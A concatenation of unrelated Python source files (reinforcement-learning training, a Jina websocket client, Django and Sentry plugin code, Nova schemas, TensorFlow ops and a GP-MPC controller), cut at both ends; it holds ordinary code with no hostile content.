'answer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'votes'", 'to': "orm['enquiry.Answer']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'votes'", 'null': 'True', 'to': "orm['auth.User']"})
}
}
complete_apps = ['enquiry']
|
from gym.envs.mujoco import HalfCheetahEnv
import rlkit.torch.pytorch_util as ptu
from rlkit.data_management.env_replay_buffer import EnvReplayBuffer
from rlkit.envs.wrappers import NormalizedBoxEnv
from rlkit.launchers.launcher_util import setup_logger
from rlkit.samplers.data_collector import MdpPathCollector
from rlkit.torch.sac.policies import TanhGaussianPolicy, MakeDeterministic
from rlkit.torch.sac.sac import SACTrainer
from rlkit.torch.networks import FlattenMlp
from rlkit.torch.torch_rl_algorithm import TorchBatchRLAlgorithm
def experiment(variant):
expl_env = NormalizedBoxEnv(HalfCheetahEnv())
eval_env = NormalizedBoxEnv(HalfCheetahEnv())
obs_dim = expl_env.observation_space.low.size
action_dim = eval_env.action_space.low.size
M = variant['layer_size']
qf1 = FlattenMlp(
input_size=obs_dim + action_dim,
output_size=1,
hidden_sizes=[M, M],
)
qf2 = FlattenMlp(
input_size=obs_dim + action_dim,
output_size=1,
hidden_sizes=[M, M],
)
target_qf1 = FlattenMlp(
input_size=obs_dim + action_dim,
output_size=1,
hidden_sizes=[M, M],
)
target_qf2 = FlattenMlp(
input_size=obs_dim + action_dim,
output_size=1,
hidden_sizes=[M, M],
)
policy = TanhGaussianPolicy(
obs_dim=obs_dim,
action_dim=action_dim,
hidden_sizes=[M, M],
)
eval_policy = MakeDeterministic(policy)
eval_path_collector = MdpPathCollector(
eval_env,
eval_policy,
)
expl_path_collector = MdpPathCollector(
expl_env,
policy,
)
replay_buffer = EnvReplayBuffer(
variant['replay_buffer_size'],
expl_env,
)
trainer = SACTrainer(
env=eval_env,
policy=policy,
qf1=qf1,
qf2=qf2,
target_qf1=target_qf1,
target_qf2=target_qf2,
**variant['trainer_kwargs']
)
algorithm = TorchBatchRLAlgorithm(
trainer=trainer,
exploration_env=expl_env,
evaluation_env=eval_env,
exploration_data_collector=expl_path_collector,
evaluation_data_collector=eval_path_collector,
replay_buffer=replay_buffer,
**variant['algorithm_kwargs']
)
algorithm.to(ptu.device)
algorithm.train(start_epoch=0)
if __name__ == "__main__":
# parser = argparse.ArgumentParser()
# parser.add_argument('--initial_epoch', action='store_true')
# args = parser.parse_args()
# noinspection PyTypeChecker
variant = dict(
algorithm="SAC",
version="normal",
layer_size=256,
replay_buffer_size=int(1E6),
algorithm_kwargs=dict(
num_epochs=3000,
num_eval_steps_per_epoch=5000,
num_trains_per_train_loop=1000,
num_expl_steps_per_train_loop=1000,
min_num_steps_before_training=1000,
max_path_length=1000,
batch_size=256,
initial_epoch=None
),
trainer_kwargs=dict(
discount=0.99,
soft_target_tau=5e-3,
target_update_period=1,
policy_lr=3E-4,
qf_lr=3E-4,
reward_scale=1,
use_automatic_entropy_tuning=True
),
)
setup_logger('name-of-experiment', variant=variant)
ptu.set_gpu_mode(True) # optionally set the GPU (default=False)
experiment(variant)
|
def reverseLists(list1) :
"""
原地用递归的方法反转list
:param list1:
:return:
"""
def helper(list1,left,right) :
if left < right :
list1[left] , list1[right] = list1[right] , list1[left]
helper(list1,left + 1 , right -1)
helper(list1,0,len(list1) - 1)
if __name__ == "__main__" :
list1 = ["a", "b", "c" , "d" , "d","e"]
reverseLists(list1)
print()
|
"""A module for the websockets-based Client for Jina."""
from typing import Callable, Optional
from contextlib import nullcontext, AsyncExitStack
from ..helper import callback_exec
from .helper import WebsocketClientlet
from ...importer import ImportExtensions
from ..base import BaseClient, InputType
from ...logging.profile import ProgressBar
from ...peapods.stream.client import WebsocketClientStreamer
class WebSocketBaseClient(BaseClient):
"""A Websocket Client."""
async def _get_results(
self,
inputs: InputType,
on_done: Callable,
on_error: Optional[Callable] = None,
on_always: Optional[Callable] = None,
**kwargs,
):
"""
:param inputs: the callable
:param on_done: the callback for on_done
:param on_error: the callback for on_error
:param on_always: the callback for on_always
:param kwargs: kwargs for _get_task_name and _get_requests
:yields: generator over results
"""
with ImportExtensions(required=True):
import aiohttp
self.inputs = inputs
request_iterator = self._get_requests(**kwargs)
async with AsyncExitStack() as stack:
try:
cm1 = (
ProgressBar(total_length=self._inputs_length)
if self.show_progress
else nullcontext()
)
p_bar = stack.enter_context(cm1)
proto = 'wss' if self.args.https else 'ws'
url = f'{proto}://{self.args.host}:{self.args.port}/'
iolet = await stack.enter_async_context(
WebsocketClientlet(url=url, logger=self.logger)
)
streamer = WebsocketClientStreamer(self.args, iolet=iolet)
async for response in streamer.stream(request_iterator):
callback_exec(
response=response,
on_error=on_error,
on_done=on_done,
on_always=on_always,
continue_on_error=self.continue_on_error,
logger=self.logger,
)
if self.show_progress:
p_bar.update()
yield response
except aiohttp.ClientError as e:
self.logger.error(
f'Error while streaming response from websocket server {e!r}'
)
|
import pickle
pranjal = {
'first_name': 'Pranjal',
'last_name': 'Patra',
'age': 35,
'NetWorth': 420.69,
'Vaccinated': True
}
with open("pranjal.bin", 'wb') as pranjal_file:
pickle.dump(pranjal, pranjal_file)
with open('pranjal.bin', 'rb') as pranjal_file:
pranjal_from_bin_file = pickle.load(pranjal_file)
print(pranjal_from_bin_file)
|
"""mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf.urls import include
urlpatterns = [
path('admin/', admin.site.urls),
path('kumarmayank', include('home.urls')),
]
|
# -*- coding: utf-8 -*-
# --------------------------------------
# @Time : 2020/11/01
# @Author : Oscar Chen
# @Email : 530824679@qq.com
# @File : ops.py
# Description :base operators.
# --------------------------------------
import tensorflow as tf
def leaky_relu(x):
return tf.nn.leaky_relu(x, alpha=0.1, name='leaky_relu')
def conv2d(inputs, filters_num, filters_size, pad_size=0, stride=1, batch_normalize=True, activation=leaky_relu, use_bias=False, is_train=True, name='conv2d'):
if pad_size > 0:
inputs = tf.pad(inputs, [[0,0], [pad_size, pad_size], [pad_size, pad_size],[0,0]])
out = tf.layers.conv2d(inputs, filters=filters_num, kernel_size=filters_size, strides=stride, padding='VALID', activation=None, use_bias=use_bias, name=name)
if batch_normalize:
out = tf.layers.batch_normalization(out, axis=-1, momentum=0.9, training=is_train, name=name+'_bn')
if activation:
out = activation(out)
return out
def maxpool(inputs, size=2, stride=2, name='maxpool'):
with tf.name_scope(name):
out = tf.layers.max_pooling2d(inputs, pool_size=size, strides=stride, padding='SAME')
return out
def reorg(inputs, stride):
return tf.space_to_depth(inputs, block_size=stride)
|
from __future__ import absolute_import
import six
from rest_framework.response import Response
from social_auth.models import UserSocialAuth
from django.conf import settings
from django.conf.urls import url
from django.core.urlresolvers import reverse
from django.utils.html import format_html
from sentry.api.serializers.models.plugin import PluginSerializer
# api compat
from sentry.exceptions import PluginError # NOQA
from sentry.models import Activity, Event, GroupMeta
from sentry.plugins import Plugin
from sentry.plugins.base.configuration import react_plugin_config
from sentry.plugins.endpoints import PluginGroupEndpoint
from sentry.signals import issue_tracker_used
from sentry.utils.auth import get_auth_providers
from sentry.utils.http import absolute_uri
from sentry.utils.safe import safe_execute
# TODO(dcramer): remove this in favor of GroupEndpoint
class IssueGroupActionEndpoint(PluginGroupEndpoint):
view_method_name = None
plugin = None
def _handle(self, request, group, *args, **kwargs):
GroupMeta.objects.populate_cache([group])
return getattr(self.plugin, self.view_method_name)(request, group, *args, **kwargs)
class IssueTrackingPlugin2(Plugin):
auth_provider = None
allowed_actions = ('create', 'link', 'unlink')
# we default this to None to support legacy integrations, but newer style
# should explicitly call out what is stored
issue_fields = None
# issue_fields = frozenset(['id', 'title', 'url'])
def configure(self, project, request):
return react_plugin_config(self, project, request)
def get_plugin_type(self):
return 'issue-tracking'
def has_project_conf(self):
return True
def get_group_body(self, request, group, event, **kwargs):
result = []
for interface in six.itervalues(event.interfaces):
output = safe_execute(interface.to_string, event, _with_transaction=False)
if output:
result.append(output)
return '\n\n'.join(result)
def get_group_description(self, request, group, event):
output = [
absolute_uri(group.get_absolute_url()),
]
body = self.get_group_body(request, group, event)
if body:
output.extend([
'',
'```',
body,
'```',
])
return '\n'.join(output)
def get_group_title(self, request, group, event):
return event.error()
def is_configured(self, request, project, **kwargs):
raise NotImplementedError
def get_group_urls(self):
_urls = []
for action in self.allowed_actions:
view_method_name = 'view_%s' % action
_urls.append(
url(
r'^%s/' % action,
PluginGroupEndpoint.as_view(
view=getattr(self, view_method_name),
),
)
)
return _urls
def get_auth_for_user(self, user, **kwargs):
"""
Return a ``UserSocialAuth`` object for the given user based on this plugins ``auth_provider``.
"""
assert self.auth_provider, 'There is no auth provider configured for this plugin.'
if not user.is_authenticated():
return None
try:
return UserSocialAuth.objects.filter(user=user, provider=self.auth_provider)[0]
except IndexError:
return None
def needs_auth(self, request, project, **kwargs):
"""
Return ``True`` if the authenticated user needs to associate an auth service before
performing actions with this plugin.
"""
if self.auth_provider is None:
return False
if not request.user.is_authenticated():
return True
return not UserSocialAuth.objects.filter(
user=request.user, provider=self.auth_provider
).exists()
def get_new_issue_fields(self, request, group, event, **kwargs):
"""
If overriding, supported properties include 'readonly': true
"""
return [
{
'name': 'title',
'label': 'Title',
'default': self.get_group_title(request, group, event),
'type': 'text'
}, {
'name': 'description',
'label': 'Description',
'default': self.get_group_description(request, group, event),
'type': 'textarea'
}
]
def get_link_existing_issue_fields(self, request, group, event, **kwargs):
return []
def _get_issue_url_compat(self, group, issue, **kwargs):
if self.issue_fields is None:
return self.get_issue_url(group, issue['id'])
return self.get_issue_url(group, issue)
def _get_issue_label_compat(self, group, issue, **kwargs):
if self.issue_fields is None:
return self.get_issue_label(group, issue['id'])
return self.get_issue_label(group, issue)
def get_issue_url(self, group, issue, **kwargs):
"""
Given an issue context (issue_id string or issue dict) return an absolute URL to the issue's details
page.
"""
raise NotImplementedError
def get_issue_label(self, group, issue, **kwargs):
"""
Given an issue context (issue_id string or issue dict) return a string representing the issue.
e.g. GitHub represents issues as GH-XXX
"""
if isinstance(issue, dict):
return u'#{}'.format(issue['id'])
return u'#{}'.format(issue)
def create_issue(self, request, group, form_data, **kwargs):
"""
Creates the issue on the remote service and returns an issue ID.
Returns ``{'id': '1', 'title': issue_title}``
"""
raise NotImplementedError
def link_issue(self, request, group, form_data, **kwargs):
"""
Can be overridden for any actions needed when linking issues
(like adding a comment to an existing issue).
Returns ``{'id': '1', 'title': issue_title}``
"""
pass
def has_auth_configured(self, **kwargs):
if not self.auth_provider:
return True
return self.auth_provider in get_auth_providers()
def validate_form(self, fields, form_data):
errors = {}
for field in fields:
if field.get('required', True) and not field.get('readonly'):
value = form_data.get(field['name'])
if value is None or value == '':
errors[field['name']] = u'%s is a required field.' % field['label']
return errors
def get_issue_field_map(self):
# XXX(dcramer): legacy support
conf_key = self.get_conf_key()
if self.issue_fields is None:
return {
'id': u'{}:tid'.format(conf_key)
}
return {
key: u'{}:issue_{}'.format(
conf_key,
key,
)
for key in self.issue_fields
}
def build_issue(self, group):
issue_field_map = self.get_issue_field_map()
issue = {}
for key, meta_name in six.iteritems(issue_field_map):
issue[key] = GroupMeta.objects.get_value(group, meta_name, None)
if not any(issue.values()):
return None
return issue
def has_linked_issue(self, group):
return bool(self.build_issue(group))
def unlink_issue(self, request, group, issue, **kwargs):
issue_field_map = self.get_issue_field_map()
for meta_name in six.itervalues(issue_field_map):
GroupMeta.objects.unset_value(group, meta_name)
return self.redirect(group.get_absolute_url())
def view_create(self, request, group, **kwargs):
auth_errors = self.check_config_and_auth(request, group)
if auth_errors:
return Response(auth_errors, status=400)
event = group.get_latest_event()
if event is None:
return Response({
'message': 'Unable to create issues: there are '
'no events associated with this group',
}, status=400)
Event.objects.bind_nodes([event], 'data')
try:
fields = self.get_new_issue_fields(request, group, event, **kwargs)
except Exception as e:
return self.handle_api_error(e)
if request.method == 'GET':
return Response(fields)
errors = self.validate_form(fields, request.DATA)
if errors:
return Response({'error_type': 'validation', 'errors': errors}, status=400)
try:
issue = self.create_issue(
group=group,
form_data=request.DATA,
request=request,
)
except Exception as e:
return self.handle_api_error(e)
if not isinstance(issue, dict):
issue = {'id': issue}
issue_field_map = self.get_issue_field_map()
for key, meta_name in six.iteritems(issue_field_map):
if key in issue:
GroupMeta.objects.set_value(group, meta_name, issue[key])
else:
GroupMeta.objects.unset_value(group, meta_name)
issue_information = {
'title': issue.get('title') or request.DATA.get('title') or self._get_issue_label_compat(group, issue),
'provider': self.get_title(),
'location': self._get_issue_url_compat(group, issue),
'label': self._get_issue_label_compat(group, issue),
}
Activity.objects.create(
project=group.project,
group=group,
type=Activity.CREATE_ISSUE,
user=request.user,
data=issue_information,
)
issue_tracker_used.send_robust(
plugin=self, project=group.project, user=request.user,
sender=type(self)
)
return Response({'issue_url': self.get_issue_url(group, issue),
'link': self._get_issue_url_compat(group, issue),
'label': self._get_issue_label_compat(group, issue),
'id': issue['id']})
def view_link(self, request, group, **kwargs):
auth_errors = self.check_config_and_auth(request, group)
if auth_errors:
return Response(auth_errors, status=400)
event = group.get_latest_event()
if event is None:
return Response({
'message': 'Unable to create issues: there are '
'no events associated with this group',
}, status=400)
Event.objects.bind_nodes([event], 'data')
try:
fields = self.get_link_existing_issue_fields(request, group, event, **kwargs)
except Exception as e:
return self.handle_api_error(e)
if request.method == 'GET':
return Response(fields)
errors = self.validate_form(fields, request.DATA)
if errors:
return Response({'error_type': 'validation', 'errors': errors}, status=400)
try:
issue = self.link_issue(
group=group,
form_data=request.DATA,
request=request,
) or {}
except Exception as e:
return self.handle_api_error(e)
# HACK(dcramer): maintain data for legacy issues
if 'id' not in issue and 'issue_id' in request.DATA:
issue['id'] = request.DATA['issue_id']
issue_field_map = self.get_issue_field_map()
for key, meta_name in six.iteritems(issue_field_map):
if key in issue:
GroupMeta.objects.set_value(group, meta_name, issue[key])
else:
GroupMeta.objects.unset_value(group, meta_name)
issue_information = {
'title': issue.get('title') or self._get_issue_label_compat(group, issue),
'provider': self.get_title(),
'location': self._get_issue_url_compat(group, issue),
'label': self._get_issue_label_compat(group, issue),
}
Activity.objects.create(
project=group.project,
group=group,
type=Activity.CREATE_ISSUE,
user=request.user,
data=issue_information,
)
return Response({'message': 'Successfully linked issue.',
'link': self._get_issue_url_compat(group, issue),
'label': self._get_issue_label_compat(group, issue),
'id': issue['id']})
def view_unlink(self, request, group, **kwargs):
auth_errors = self.check_config_and_auth(request, group)
if auth_errors:
return Response(auth_errors, status=400)
issue = self.build_issue(group)
if issue and 'unlink' in self.allowed_actions:
self.unlink_issue(request, group, issue)
return Response({'message': 'Successfully unlinked issue.'})
return Response({'message': 'No issues to unlink.'}, status=400)
def plugin_issues(self, request, group, plugin_issues, **kwargs):
if not self.is_configured(request=request, project=group.project):
return plugin_issues
item = {
'slug': self.slug,
'allowed_actions': self.allowed_actions,
'title': self.get_title()
}
issue = self.build_issue(group)
if issue:
item['issue'] = {
'issue_id': issue.get('id'),
'url': self._get_issue_url_compat(group, issue),
'label': self._get_issue_label_compat(group, issue),
}
item.update(PluginSerializer(group.project).serialize(self, None, request.user))
plugin_issues.append(item)
return plugin_issues
def get_config(self, *args, **kwargs):
# TODO(dcramer): update existing plugins to just use get_config
# TODO(dcramer): remove request kwarg after sentry-plugins has been
# updated
kwargs.setdefault('request', None)
return self.get_configure_plugin_fields(*args, **kwargs)
def check_config_and_auth(self, request, group):
has_auth_configured = self.has_auth_configured()
if not (has_auth_configured and self.is_configured(
project=group.project, request=request)):
if self.auth_provider:
required_auth_settings = settings.AUTH_PROVIDERS[self.auth_provider]
else:
required_auth_settings = None
return {
'error_type': 'config',
'has_auth_configured': has_auth_configured,
'auth_provider': self.auth_provider,
'required_auth_settings': required_auth_settings,
}
if self.needs_auth(project=group.project, request=request):
return {
'error_type': 'auth',
'auth_url': reverse('socialauth_associate', args=[self.auth_provider])
}
# TODO: should we get rid of this (move it to react?)
def tags(self, request, group, tag_list, **kwargs):
if not self.is_configured(request=request, project=group.project):
return tag_list
issue = self.build_issue(group)
if not issue:
return tag_list
tag_list.append(
format_html(
'<a href="{}">{}</a>',
self._get_issue_url_compat(group, issue),
self._get_issue_label_compat(group, issue),
)
)
return tag_list
IssuePlugin2 = IssueTrackingPlugin2
|
# Copyright 2014 IBM Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from nova.api.validation import parameter_types
create = {
'type': 'object',
'properties': {
'volume': {
'type': 'object',
'properties': {
'volume_type': {'type': 'string'},
'metadata': {'type': 'object'},
'snapshot_id': {'type': 'string'},
'size': {
'type': ['integer', 'string'],
'pattern': '^[0-9]+$',
'minimum': 1
},
'availability_zone': {'type': 'string'},
'display_name': {'type': 'string'},
'display_description': {'type': 'string'},
},
'required': ['size'],
'additionalProperties': False,
},
},
'required': ['volume'],
'additionalProperties': False,
}
snapshot_create = {
'type': 'object',
'properties': {
'snapshot': {
'type': 'object',
'properties': {
'volume_id': {'type': 'string'},
'force': parameter_types.boolean,
'display_name': {'type': 'string'},
'display_description': {'type': 'string'},
},
'required': ['volume_id'],
'additionalProperties': False,
},
},
'required': ['snapshot'],
'additionalProperties': False,
}
create_volume_attachment = {
'type': 'object',
'properties': {
'volumeAttachment': {
'type': 'object',
'properties': {
'volumeId': parameter_types.volume_id,
'device': {
'type': ['string', 'null'],
# NOTE: The validation pattern from match_device() in
# nova/block_device.py.
'pattern': '(^/dev/x{0,1}[a-z]{0,1}d{0,1})([a-z]+)[0-9]*$'
}
},
'required': ['volumeId'],
'additionalProperties': False,
},
},
'required': ['volumeAttachment'],
'additionalProperties': False,
}
update_volume_attachment = copy.deepcopy(create_volume_attachment)
del update_volume_attachment['properties']['volumeAttachment'][
'properties']['device']
|
"""Model Predictive Control with a Gaussian Process model.
Based on:
* L. Hewing, J. Kabzan and M. N. Zeilinger, "Cautious Model Predictive Control Using Gaussian Process Regression,"
in IEEE Transactions on Control Systems Technology, vol. 28, no. 6, pp. 2736-2743, Nov. 2020, doi: 10.1109/TCST.2019.2949757.
Implementation details:
1. The previous time step MPC solution is used to compute the set constraints and GP dynamics rollout.
Here, the dynamics are rolled out using the Mean Equivelence method, the fastest, but least accurate.
2. The GP is approximated using the Fully Independent Training Conditional (FITC) outlined in
* J. Quinonero-Candela, C. E. Rasmussen, and R. Herbrich, “A unifying view of sparse approximate Gaussian process regression,”
Journal of Machine Learning Research, vol. 6, pp. 1935–1959, 2005.
https://www.jmlr.org/papers/volume6/quinonero-candela05a/quinonero-candela05a.pdf
* E. Snelson and Z. Ghahramani, “Sparse gaussian processes using pseudo-inputs,” in Advances in Neural Information Processing
Systems, Y. Weiss, B. Scholkopf, and J. C. Platt, Eds., 2006, pp. 1257–1264.
and the inducing points are the previous MPC solution.
3. Each dimension of the learned error dynamics is an independent Zero Mean SE Kernel GP.
"""
import scipy
import numpy as np
import casadi as cs
import time
import torch
import gpytorch
from copy import deepcopy
from skopt.sampler import Lhs
from functools import partial
from sklearn.model_selection import train_test_split
from safe_control_gym.controllers.mpc.linear_mpc import LinearMPC, MPC
from safe_control_gym.controllers.mpc.mpc_utils import discretize_linear_system
from safe_control_gym.controllers.mpc.gp_utils import GaussianProcessCollection, ZeroMeanIndependentGPModel, covSEard
from safe_control_gym.envs.benchmark_env import Task
class GPMPC(MPC):
"""MPC with Gaussian Process as dynamics residual.
"""
def __init__(
self,
env_func,
seed: int = 1337,
horizon: int = 5,
q_mpc: list = [1],
r_mpc: list = [1],
additional_constraints: list = None,
use_prev_start: bool = True,
train_iterations: int = 800,
validation_iterations: int = 200,
optimization_iterations: list = None,
learning_rate: list = None,
normalize_training_data: bool = False,
use_gpu: bool = False,
gp_model_path: str = None,
prob: float = 0.955,
initial_rollout_std: float = 0.005,
input_mask: list = None,
target_mask: list = None,
gp_approx: str = 'mean_eq',
sparse_gp: bool = False,
online_learning: bool = False,
inertial_prop: list = [1.0],
prior_param_coeff: float = 1.0,
output_dir: str = "results/temp",
**kwargs
):
"""Initialize GP-MPC.
Args:
env_func (gym.Env): functionalized initialization of the environment.
seed (int): random seed.
horizon (int): MPC planning horizon.
Q, R (np.array): cost weight matrix.
use_prev_start (bool): Warmstart mpc with the previous solution.
train_iterations (int): the number of training examples to use for each dimension of the GP.
validation_iterations (int): the number of points to use use for the test set during training.
optimization_iterations (list): the number of optimization iterations for each dimension of the GP.
learning_rate (list): the learning rate for training each dimension of the GP.
normalize_training_data (bool): Normalize the training data.
use_gpu (bool): use GPU while training the gp.
gp_model_path (str): path to a pretrained GP model. If None, will train a new one.
output_dir (str): directory to store model and results.
prob (float): desired probabilistic safety level.
initial_rollout_std (float): the initial std (across all states) for the mean_eq rollout.
inertial_prop (list): to initialize the inertial properties of the prior model.
prior_param_coeff (float): constant multiplying factor to adjust the prior model intertial properties.
input_mask (list): list of which input dimensions to use in GP model. If None, all are used.
target_mask (list): list of which output dimensions to use in the GP model. If None, all are used.
gp_approx (str): 'mean_eq' used mean equivalence rollout for the GP dynamics. Only one that works currently.
online_learning (bool): if true, GP kernel values will be updated using past trajectory values.
additional_constraints (list): list of Constraint objects defining additional constraints to be used.
"""
print("############################################### GP-MPC hexa ###########################################")
self.prior_env_func = partial(env_func,
inertial_prop=np.array(inertial_prop)*prior_param_coeff)
self.prior_param_coeff = prior_param_coeff
# Initialize the method using linear MPC.
self.prior_ctrl = LinearMPC(
self.prior_env_func,
horizon=horizon,
q_mpc=q_mpc,
r_mpc=r_mpc,
use_prev_start=use_prev_start,
output_dir=output_dir,
additional_constraints=additional_constraints,
)
self.prior_ctrl.reset()
super().__init__(
self.prior_env_func,
horizon=horizon,
q_mpc=q_mpc,
r_mpc=r_mpc,
use_prev_start=use_prev_start,
output_dir=output_dir,
additional_constraints=additional_constraints,
**kwargs)
# Setup environments.
self.env_func = env_func
self.env = env_func(randomized_init=False)
self.env_training = env_func(randomized_init=True)
# No training data accumulated yet so keep the dynamics function as linear prior.
self.train_data = None
self.prior_dynamics_func = self.prior_ctrl.linear_dynamics_func
# GP and training parameters.
self.gaussian_process = None
self.train_iterations = train_iterations
self.validation_iterations = validation_iterations
self.optimization_iterations = optimization_iterations
self.learning_rate = learning_rate
self.gp_model_path = gp_model_path
self.normalize_training_data = normalize_training_data
self.use_gpu = use_gpu
self.seed = seed
self.prob = prob
self.sparse_gp = sparse_gp
if input_mask is None:
self.input_mask = np.arange(self.model.nx + self.model.nu).tolist()
else:
self.input_mask = input_mask
if target_mask is None:
self.target_mask = np.arange(self.model.nx).tolist()
else:
self.target_mask = target_mask
Bd = np.eye(self.model.nx)
self.Bd = Bd[:, self.target_mask]
self.gp_approx = gp_approx
self.online_learning = online_learning
self.last_obs = None
self.last_action = None
self.initial_rollout_std = initial_rollout_std
def setup_prior_dynamics(self):
"""Computes the LQR gain used for propograting GP uncertainty from the prior model dynamics.
"""
# Determine the LQR gain K to propogate the input uncertainty (doing this at each timestep will increase complexity).
A, B = discretize_linear_system(self.prior_ctrl.dfdx, self.prior_ctrl.dfdu, self.dt)
Q_lqr = self.Q
R_lqr = self.R
P = scipy.linalg.solve_discrete_are(A, B, Q_lqr, R_lqr)
btp = np.dot(B.T, P)
self.lqr_gain = -np.dot(np.linalg.inv(self.R + np.dot(btp, B)), np.dot(btp, A))
self.discrete_dfdx = A
self.discrete_dfdu = B
def set_gp_dynamics_func(self):
"""Updates symbolic dynamics.
With actual control frequency, initialize GP model and add to the combined dynamics.
"""
self.setup_prior_dynamics()
# Compute the probabilistic constraint inverse CDF according to section III.D.b in Hewing 2019.
self.inverse_cdf = scipy.stats.norm.ppf(1 - (1/self.model.nx - (self.prob + 1)/(2*self.model.nx)))
self.create_sparse_GP_machinery()
def create_sparse_GP_machinery(self):
"""This setups the gaussian process approximations for FITC formulation.
"""
lengthscales, signal_var, noise_var, gp_K_plus_noise = self.gaussian_process.get_hyperparameters(as_numpy=True)
self.length_scales = lengthscales.squeeze()
self.signal_var = signal_var.squeeze()
self.noise_var = noise_var.squeeze()
self.gp_K_plus_noise = gp_K_plus_noise
Nx = len(self.input_mask)
Ny = len(self.target_mask)
N = self.gaussian_process.n_training_samples
# Create CasADI function for computing the kernel K_z_zind with parameters for z, z_ind, length scales and signal variance.
# We need the CasADI version of this so that it can by symbolically differentiated in in the MPC optimization.
z1 = cs.SX.sym('z1', Nx)
z2 = cs.SX.sym('z2', Nx)
ell_s = cs.SX.sym('ell', Nx)
sf2_s = cs.SX.sym('sf2')
z_ind = cs.SX.sym('z_ind', self.T, Nx)
covSE = cs.Function('covSE', [z1, z2, ell_s, sf2_s],
[covSEard(z1, z2, ell_s, sf2_s)])
ks = cs.SX.zeros(1, self.T)
for i in range(self.T):
ks[i] = covSE(z1, z_ind[i, :], ell_s, sf2_s)
ks_func = cs.Function('K_s', [z1, z_ind, ell_s, sf2_s], [ks])
K_z_zind = cs.SX.zeros(Ny, self.T)
for i in range(Ny):
K_z_zind[i,:] = ks_func(z1, z_ind, self.length_scales[i,:], self.signal_var[i])
# This will be mulitplied by the mean_post_factor computed at every time step to compute the approximate mean.
self.K_z_zind_func = cs.Function('K_z_zind', [z1, z_ind],[K_z_zind],['z1', 'z2'],['K'])
def preprocess_training_data(self,
x_seq,
u_seq,
x_next_seq
):
"""Converts trajectory data for GP trianing.
Args:
x_seq (list): state sequence of np.array (nx,).
u_seq (list): action sequence of np.array (nu,).
x_next_seq (list): next state sequence of np.array (nx,).
Returns:
np.array: inputs for GP training, (N, nx+nu).
np.array: targets for GP training, (N, nx).
"""
# Get the predicted dynamics. This is a linear prior, thus we need to account for the fact that
# it is linearized about an eq using self.X_GOAL and self.U_GOAL.
x_pred_seq = self.prior_dynamics_func(x0=x_seq.T - self.prior_ctrl.X_LIN[:, None],
p=u_seq.T - self.prior_ctrl.U_LIN[:,None])['xf'].toarray()
targets = (x_next_seq.T - (x_pred_seq+self.prior_ctrl.X_LIN[:,None])).transpose() # (N, nx).
inputs = np.hstack([x_seq, u_seq]) # (N, nx+nu).
return inputs, targets
def precompute_probabilistic_limits(self,
print_sets=True
):
"""This updates the constraint value limits to account for the uncertainty in the dynamics rollout.
Args:
print_sets (bool): True to print out the sets for debugging purposes.
"""
nx, nu = self.model.nx, self.model.nu
T = self.T
state_covariances = np.zeros((self.T+1, nx, nx))
input_covariances = np.zeros((self.T, nu, nu))
# Initilize lists for the tightening of each constraint.
state_constraint_set = []
for state_constraint in self.constraints.state_constraints:
state_constraint_set.append(np.zeros((state_constraint.num_constraints, T+1)))
input_constraint_set = []
for input_constraint in self.constraints.input_constraints:
input_constraint_set.append(np.zeros((input_constraint.num_constraints, T)))
if self.x_prev is not None and self.u_prev is not None:
cov_x = np.diag([self.initial_rollout_std**2]*nx)
for i in range(T):
state_covariances[i] = cov_x
cov_u = self.lqr_gain @ cov_x @ self.lqr_gain.T
input_covariances[i] = cov_u
cov_xu = cov_x @ self.lqr_gain.T
z = np.hstack((self.x_prev[:,i], self.u_prev[:,i]))
if self.gp_approx == 'taylor':
raise NotImplementedError("Taylor GP approximation is currently not working.")
elif self.gp_approx == 'mean_eq':
_, cov_d_tensor = self.gaussian_process.predict(z[None,:], return_pred=False)
cov_d = cov_d_tensor.detach().numpy()
else:
raise NotImplementedError('gp_approx method is incorrect or not implemented')
# Loop through input constraints and tighten by the required ammount.
for ui, input_constraint in enumerate(self.constraints.input_constraints):
input_constraint_set[ui][:, i] = -1*self.inverse_cdf * \
np.absolute(input_constraint.A) @ np.sqrt(np.diag(cov_u))
for si, state_constraint in enumerate(self.constraints.state_constraints):
state_constraint_set[si][:, i] = -1*self.inverse_cdf * \
np.absolute(state_constraint.A) @ np.sqrt(np.diag(cov_x))
if self.gp_approx == 'taylor':
raise NotImplementedError("Taylor GP rollout not implemented.")
elif self.gp_approx == 'mean_eq':
# Compute the next step propogated state covariance using mean equivilence.
cov_x = self.discrete_dfdx @ cov_x @ self.discrete_dfdx.T + \
self.discrete_dfdx @ cov_xu @ self.discrete_dfdu.T + \
self.discrete_dfdu @ cov_xu.T @ self.discrete_dfdx.T + \
self.discrete_dfdu @ cov_u @ self.discrete_dfdu.T + \
self.Bd @ cov_d @ self.Bd.T
else:
raise NotImplementedError('gp_approx method is incorrect or not implemented')
# Udate Final covariance.
for si, state_constraint in enumerate(self.constraints.state_constraints):
state_constraint_set[si][:,-1] = -1 * self.inverse_cdf * \
np.absolute(state_constraint.A) @ np.sqrt(np.diag(cov_x))
state_covariances[-1] = cov_x
if print_sets:
print("Probabilistic State Constraint values along Horizon:")
print(state_constraint_set)
print("Probabilistic Input Constraint values along Horizon:")
print(input_constraint_set)
self.results_dict['input_constraint_set'].append(input_constraint_set)
self.results_dict['state_constraint_set'].append(state_constraint_set)
self.results_dict['state_horizon_cov'].append(state_covariances)
self.results_dict['input_horizon_cov'].append(input_covariances)
return state_constraint_set, input_constraint_set
def precompute_sparse_gp_values(self):
